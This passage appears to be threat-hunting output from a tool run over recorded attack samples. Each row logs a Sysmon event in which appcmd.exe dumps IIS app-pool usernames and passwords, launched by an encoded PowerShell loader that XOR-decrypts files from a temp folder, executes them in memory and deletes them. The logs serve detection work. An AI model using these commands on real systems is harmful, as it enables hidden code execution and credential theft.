ABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.971 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool ""Line Number: 0"" /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.041 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool ""Line Number: 0"" /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.121 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.202 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.282 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.352 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc 